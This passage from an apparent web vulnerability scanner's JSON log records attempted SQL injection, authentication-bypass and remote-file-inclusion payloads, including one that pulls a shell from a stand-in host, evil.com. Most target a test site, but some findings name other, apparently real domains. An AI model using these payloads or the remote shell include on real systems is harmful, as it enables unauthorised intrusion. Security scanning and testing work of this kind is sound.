pic: negative controls show same behavior (2/4 controls match) (score: 30/100)", "timestamp": 1771805750.5929239 }, { "vuln_type": "xss_reflected", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php?pic=1", "attempted_payloads": [ "" ], "failure_reason": "Rejected xss_reflected in pic: negative controls show same behavior (2/4 controls match) (score: 30/100)", "timestamp": 1771805752.1684322 }, { "vuln_type": "xss_reflected", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php?pic=1", "attempted_payloads": [ "" ], "failure_reason": "Rejected xss_reflected in pic: negative controls show same behavior (2/4 controls match) (score: 30/100)", "timestamp": 1771805753.733855 }, { "vuln_type": "sqli_error", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php?pic=1", "attempted_payloads": [ "'" ], "failure_reason": "Rejected sqli_error in pic: negative controls show same behavior (2/4 controls match) (score: 30/100)", "timestamp": 1771805755.2986062 }, { "vuln_type": "sqli_error", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php?pic=1", "attempted_payloads": [ "\"" ], "failure_reason": "Rejected sqli_error in pic: negative controls show same behavior (2/4 controls match) (score: 30/100)", "timestamp": 1771805756.867149 }, { "vuln_type": "sqli_error", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php?pic=1", "attempted_payloads": [ "' OR '1'='1" ], "failure_reason": "Rejected sqli_error in pic: negative controls show same behavior (2/4 controls match) (score: 30/100)", "timestamp": 1771805758.4554482 }, { "vuln_type": "sqli_blind", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php?pic=1", "attempted_payloads": [ "' AND 1=1--" ], "failure_reason": "Rejected sqli_blind in pic: negative controls show same behavior (2/4 controls match) (score: 30/100)", "timestamp": 1771805760.024313 }, { "vuln_type": "sqli_blind", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php?pic=1", "attempted_payloads": [ "' AND 1=2--" ], "failure_reason": "Rejected sqli_blind in pic: negative controls show same behavior (2/4 controls match) (score: 30/100)", "timestamp": 1771805761.607185 }, { "vuln_type": "sqli_time", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/search.php", "attempted_payloads": [ "'; WAITFOR DELAY '0:0:5'--" ], "failure_reason": "Rejected sqli_time in test: no proof of execution (score: 20/100)", "timestamp": 1771805837.551647 }, { "vuln_type": "rfi", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/listproducts.php", "attempted_payloads": [ "http://evil.com/shell.txt" ], "failure_reason": "Rejected rfi in cat: no proof of execution; negative controls show same behavior (1/4 controls match) (score: 0/100)", "timestamp": 1771805837.868068 }, { "vuln_type": "sqli_time", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/listproducts.php", "attempted_payloads": [ "'; WAITFOR DELAY '0:0:5'--" ], "failure_reason": "Rejected sqli_time in cat: no proof of execution; negative controls show same behavior (1/4 controls match) (score: 0/100)", "timestamp": 1771805839.311368 }, { "vuln_type": "rfi", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/artists.php", "attempted_payloads": [ "http://evil.com/shell.txt" ], "failure_reason": "Rejected rfi in artist: no proof of execution; negative controls show same behavior (1/4 controls match) (score: 0/100)", "timestamp": 1771805839.628087 }, { "vuln_type": "sqli_time", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/artists.php", "attempted_payloads": [ "'; WAITFOR DELAY '0:0:5'--" ], "failure_reason": "Rejected sqli_time in artist: no proof of execution; negative controls show same behavior (1/4 controls match) (score: 0/100)", "timestamp": 1771805840.8821042 }, { "vuln_type": "rfi", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php", "attempted_payloads": [ "http://evil.com/shell.txt" ], "failure_reason": "Rejected rfi in pic: no proof of execution; negative controls show same behavior (3/4 controls match) (score: 0/100)", "timestamp": 1771805843.089107 }, { "vuln_type": "sqli_union", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/listproducts.php", "attempted_payloads": [ "' UNION SELECT NULL--" ], "failure_reason": "Rejected sqli_union in cat: negative controls show same behavior (1/4 controls match) (score: 30/100)", "timestamp": 1771805843.09634 }, { "vuln_type": "sqli_time", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php", "attempted_payloads": [ "'; WAITFOR DELAY '0:0:5'--" ], "failure_reason": "Rejected sqli_time in pic: no proof of execution; negative controls show same behavior (2/4 controls match) (score: 0/100)", "timestamp": 1771805843.402582 }, { "vuln_type": "sqli_union", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/artists.php", "attempted_payloads": [ "' UNION SELECT NULL--" ], "failure_reason": "Rejected sqli_union in artist: negative controls show same behavior (1/4 controls match) (score: 30/100)", "timestamp": 1771805844.676404 }, { "vuln_type": "sqli_time", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/search.php?test=1", "attempted_payloads": [ "'; WAITFOR DELAY '0:0:5'--" ], "failure_reason": "Rejected sqli_time in searchFor: no proof of execution (score: 20/100)", "timestamp": 1771805846.2387269 }, { "vuln_type": "sqli_union", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php", "attempted_payloads": [ "' UNION SELECT NULL--" ], "failure_reason": "Rejected sqli_union in pic: negative controls show same behavior (1/4 controls match) (score: 30/100)", "timestamp": 1771805846.582627 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "' OR '1'='1" ], "failure_reason": "Rejected auth_bypass in id: no proof of execution; negative controls show same behavior (4/4 controls match) (score: 0/100)", "timestamp": 1771807039.887298 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "admin'--" ], "failure_reason": "Rejected auth_bypass in id: no proof of execution; negative controls show same behavior (4/4 controls match) (score: 0/100)", "timestamp": 1771807041.470058 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "admin' #" ], "failure_reason": "Rejected auth_bypass in id: no proof of execution; negative controls show same behavior (4/4 controls match) (score: 0/100)", "timestamp": 1771807043.0517702 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "' OR '1'='1" ], "failure_reason": "Rejected auth_bypass in q: no proof of execution; negative controls show same behavior (4/4 controls match) (score: 0/100)", "timestamp": 1771807044.633863 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "admin'--" ], "failure_reason": "Rejected auth_bypass in q: no proof of execution; negative controls show same behavior (4/4 controls match) (score: 0/100)", "timestamp": 1771807046.215348 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "admin' #" ], "failure_reason": "Rejected auth_bypass in q: no proof of execution; negative controls show same behavior (4/4 controls match) (score: 0/100)", "timestamp": 1771807047.789428 }, { "vuln_type": "rfi", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/listproducts.php", "attempted_payloads": [ "http://evil.com/shell.txt" ], "failure_reason": "Rejected rfi in cat: no proof of execution; negative controls show same behavior (1/4 controls match) (score: 0/100)", "timestamp": 1771807222.354126 }, { "vuln_type": "sqli_time", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/listproducts.php", "attempted_payloads": [ "'; WAITFOR DELAY '0:0:5'--" ], "failure_reason": "Rejected sqli_time in cat: no proof of execution; negative controls show same behavior (1/4 controls match) (score: 0/100)", "timestamp": 1771807226.270494 }, { "vuln_type": "rfi", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/artists.php", "attempted_payloads": [ "http://evil.com/shell.txt" ], "failure_reason": "Rejected rfi in artist: no proof of execution; negative controls show same behavior (1/4 controls match) (score: 0/100)", "timestamp": 1771807226.7394428 }, { "vuln_type": "sqli_union", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/listproducts.php", "attempted_payloads": [ "' UNION SELECT NULL--" ], "failure_reason": "Rejected sqli_union in cat: negative controls show same behavior (1/4 controls match) (score: 30/100)", "timestamp": 1771807227.814064 }, { "vuln_type": "sqli_time", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/artists.php", "attempted_payloads": [ "'; WAITFOR DELAY '0:0:5'--" ], "failure_reason": "Rejected sqli_time in artist: no proof of execution; negative controls show same behavior (1/4 controls match) (score: 0/100)", "timestamp": 1771807228.05146 }, { "vuln_type": "sqli_union", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/artists.php", "attempted_payloads": [ "' UNION SELECT NULL--" ], "failure_reason": "Rejected sqli_union in artist: negative controls show same behavior (1/4 controls match) (score: 30/100)", "timestamp": 1771807229.3852532 }, { "vuln_type": "sqli_time", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/search.php", "attempted_payloads": [ "'; WAITFOR DELAY '0:0:5'--" ], "failure_reason": "Rejected sqli_time in test: no proof of execution (score: 20/100)", "timestamp": 1771807229.639891 }, { "vuln_type": "sqli_time", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php", "attempted_payloads": [ "'; WAITFOR DELAY '0:0:5'--" ], "failure_reason": "Rejected sqli_time in pic: no proof of execution; negative controls show same behavior (2/4 controls match) (score: 0/100)", "timestamp": 1771807232.974085 }, { "vuln_type": "rfi", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php", "attempted_payloads": [ "http://evil.com/shell.txt" ], "failure_reason": "Rejected rfi in pic: no proof of execution; negative controls show same behavior (3/4 controls match) (score: 0/100)", "timestamp": 1771807234.8649979 }, { "vuln_type": "sqli_union", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php", "attempted_payloads": [ "' UNION SELECT NULL--" ], "failure_reason": "Rejected sqli_union in pic: negative controls show same behavior (1/4 controls match) (score: 30/100)", "timestamp": 1771807237.138626 } ], "strategies": { "server: nginx/1.19.0": { "technology": "Server: nginx/1.19.0", "vuln_types_found": [ "sqli_union", "sqli_error", "xss_dom", "nosql_injection", "missing_xcto", "blind_xss", "sqli_blind", "directory_listing", "xss_reflected", "sensitive_data_exposure", "missing_csp", "csrf", "cleartext_transmission", "clickjacking" ], "priority_order": [ "xss_reflected", "xss_reflected", "sqli_error", "sqli_blind", "xss_reflected", "sqli_union", "csrf", "csrf", "csrf", "csrf" ], "key_insights": [ "sensitive_data_exposure found at http://testphp.vulnweb.com/ (confidence: 0)", "sqli_blind found at http://testphp.vulnweb.com/search.php?test=1&test= (confidence: 100)", "xss_reflected found at http://testphp.vulnweb.com/hpp/params.php?p=valid& (confidence: 100)", "clickjacking found at http://testphp.vulnweb.com/ (confidence: 0)", "sqli_error found at http://testphp.vulnweb.com/search.php?test=1&test= (confidence: 100)", "xss_reflected found at http://testphp.vulnweb.com/showimage.php?file=1&fi (confidence: 100)", "missing_xcto found at http://testphp.vulnweb.com/ (confidence: 0)", "missing_csp found at http://testphp.vulnweb.com/ (confidence: 0)", "sqli_error found at http://testphp.vulnweb.com/search.php?test=query&t (confidence: 100)", "sqli_blind found at http://testphp.vulnweb.com/search.php?test=query&t (confidence: 100)", "xss_reflected found at http://testphp.vulnweb.com/hpp/?pp=12&pp=%3Cscript (confidence: 100)" ], "scan_count": 8, "success_rate": 0.0, "timestamp": 1771807282.427767 }, "php/5.6.40-38+ubuntu20.04.1+deb.sury.org+1": { "technology": "PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1", "vuln_types_found": [ "sqli_union", "sqli_error", "xss_dom", "nosql_injection", "missing_xcto", "blind_xss", "sqli_blind", "directory_listing", "xss_reflected", "sensitive_data_exposure", "missing_csp", "csrf", "cleartext_transmission", "clickjacking" ], "priority_order": [ "xss_reflected", "xss_reflected", "sqli_error", "sqli_blind", "xss_reflected", "sqli_union", "csrf", "csrf", "csrf", "csrf" ], "key_insights": [ "sensitive_data_exposure found at http://testphp.vulnweb.com/ (confidence: 0)", "sqli_blind found at http://testphp.vulnweb.com/search.php?test=1&test= (confidence: 100)", "xss_reflected found at http://testphp.vulnweb.com/hpp/params.php?p=valid& (confidence: 100)", "clickjacking found at http://testphp.vulnweb.com/ (confidence: 0)", "sqli_error found at http://testphp.vulnweb.com/search.php?test=1&test= (confidence: 100)", "xss_reflected found at http://testphp.vulnweb.com/showimage.php?file=1&fi (confidence: 100)", "missing_xcto found at http://testphp.vulnweb.com/ (confidence: 0)", "missing_csp found at http://testphp.vulnweb.com/ (confidence: 0)", "sqli_error found at http://testphp.vulnweb.com/search.php?test=query&t (confidence: 100)", "sqli_blind found at http://testphp.vulnweb.com/search.php?test=query&t (confidence: 100)", "xss_reflected found at http://testphp.vulnweb.com/hpp/?pp=12&pp=%3Cscript (confidence: 100)" ], "scan_count": 8, "success_rate": 0.0, "timestamp": 1771807282.4323251 }, "php": { "technology": "PHP", "vuln_types_found": [ "sqli_union", "sqli_error", "xss_dom", "nosql_injection", "missing_xcto", "blind_xss", "sqli_blind", "directory_listing", "xss_reflected", "sensitive_data_exposure", "missing_csp", "csrf", "cleartext_transmission", "clickjacking" ], "priority_order": [ "xss_reflected", "xss_reflected", "sqli_error", "sqli_blind", "xss_reflected", "sqli_union", "csrf", "csrf", "csrf", "csrf" ], "key_insights": [ "sensitive_data_exposure found at http://testphp.vulnweb.com/ (confidence: 0)", "sqli_blind found at http://testphp.vulnweb.com/search.php?test=1&test= (confidence: 100)", "xss_reflected found at http://testphp.vulnweb.com/hpp/params.php?p=valid& (confidence: 100)", "clickjacking found at http://testphp.vulnweb.com/ (confidence: 0)", "sqli_error found at http://testphp.vulnweb.com/search.php?test=1&test= (confidence: 100)", "xss_reflected found at http://testphp.vulnweb.com/showimage.php?file=1&fi (confidence: 100)", "missing_xcto found at http://testphp.vulnweb.com/ (confidence: 0)", "missing_csp found at http://testphp.vulnweb.com/ (confidence: 0)", "sqli_error found at http://testphp.vulnweb.com/search.php?test=query&t (confidence: 100)", "sqli_blind found at http://testphp.vulnweb.com/search.php?test=query&t (confidence: 100)", "xss_reflected found at http://testphp.vulnweb.com/hpp/?pp=12&pp=%3Cscript (confidence: 100)" ], "scan_count": 8, "success_rate": 0.0, "timestamp": 1771807282.438432 }, "server: cloudflare": { "technology": "Server: cloudflare", "vuln_types_found": [ "csrf", "ssti", "ssl_issues", "missing_csp", "missing_hsts", "missing_xcto" ], "priority_order": [ "ssti", "csrf", "missing_hsts", "ssl_issues", "missing_csp", "missing_csp", "missing_hsts" ], "key_insights": [ "ssl_issues found at https://hackersec.com (confidence: 0)", "missing_hsts found at https://unico.io/ (confidence: 0)", "missing_hsts found at https://unico.io (confidence: 0)", "csrf found at https://has.hackersec.com (confidence: 0)", "ssti found at https://hackersec.com/download?id=%3Csvg/onload%3D (confidence: 100)", "missing_hsts found at https://hackersec.com (confidence: 0)", "missing_xcto found at https://unico.io/ (confidence: 0)", "missing_csp found at https://unico.io (confidence: 0)", "missing_csp found at https://unico.io/ (confidence: 0)", "missing_csp found at https://hackersec.com (confidence: 0)", "missing_xcto found at https://unico.io (confidence: 0)" ], "scan_count": 3, "success_rate": 0.0, "timestamp": 1771341192.942349 }, "waf:cloudflare (100%)": { "technology": "WAF:cloudflare (100%)", "vuln_types_found": [ "missing_csp", "missing_hsts", "missing_xcto" ], "priority_order": [ "missing_hsts", "missing_xcto", "missing_csp" ], "key_insights": [ "missing_hsts found at https://unico.io (confidence: 0)", "missing_hsts found at https://unico.io/ (confidence: 0)", "missing_csp found at https://unico.io/ (confidence: 0)", "missing_csp found at https://unico.io (confidence: 0)", "missing_xcto found at https://unico.io/ (confidence: 0)", "missing_xcto found at https://unico.io (confidence: 0)" ], "scan_count": 2, "success_rate": 0.0, "timestamp": 1771340713.252238 }, "angular": { "technology": "Angular", "vuln_types_found": [ "ssti", "ssl_issues", "missing_hsts", "missing_csp", "csrf" ], "priority_order": [ "csrf", "csrf", "missing_csp" ], "key_insights": [ "missing_csp found at https://hackersec.com (confidence: 0)", "ssti found at https://hackersec.com/download?id=%3Csvg/onload%3D (confidence: 100)", "csrf found at https://sistema.soc.com.br/WebSoc/recuperacao-senh (confidence: 0)", "csrf found at https://sistema.soc.com.br/ (confidence: 0)", "missing_hsts found at https://hackersec.com (confidence: 0)", "csrf found at https://has.hackersec.com (confidence: 0)", "missing_csp found at https://sistema.soc.com.br/ (confidence: 0)", "ssl_issues found at https://hackersec.com (confidence: 0)" ], "scan_count": 3, "success_rate": 0.0, "timestamp": 1771384253.624866 }, "jquery": { "technology": "jQuery", "vuln_types_found": [ "ssti", "ssl_issues", "missing_hsts", "missing_csp", "csrf" ], "priority_order": [ "csrf", "csrf", "missing_csp" ], "key_insights": [ "missing_csp found at https://hackersec.com (confidence: 0)", "ssti found at https://hackersec.com/download?id=%3Csvg/onload%3D (confidence: 100)", "csrf found at https://sistema.soc.com.br/WebSoc/recuperacao-senh (confidence: 0)", "csrf found at https://sistema.soc.com.br/ (confidence: 0)", "missing_hsts found at https://hackersec.com (confidence: 0)", "csrf found at https://has.hackersec.com (confidence: 0)", "missing_csp found at https://sistema.soc.com.br/ (confidence: 0)", "ssl_issues found at https://hackersec.com (confidence: 0)" ], "scan_count": 3, "success_rate": 0.0, "timestamp": 1771384253.631051 }, "server: cloudfront": { "technology": "Server: CloudFront", "vuln_types_found": [ "missing_csp", "csrf" ], "priority_order": [ "csrf", "csrf", "missing_csp" ], "key_insights": [ "csrf found at https://sistema.soc.com.br/ (confidence: 0)", "csrf found at https://sistema.soc.com.br/WebSoc/recuperacao-senh (confidence: 0)", "missing_csp found at https://sistema.soc.com.br/ (confidence: 0)" ], "scan_count": 2, "success_rate": 0.0, "timestamp": 1771384253.616843 } }, "last_updated": 1771807282.442196, "stats": { "total_traces": 169, "total_failures": 186, "technologies": [ "server: nginx/1.19.0", "php/5.6.40-38+ubuntu20.04.1+deb.sury.org+1", "php", "server: cloudflare", "waf:cloudflare (100%)", "angular", "jquery", "server: cloudfront" ] } }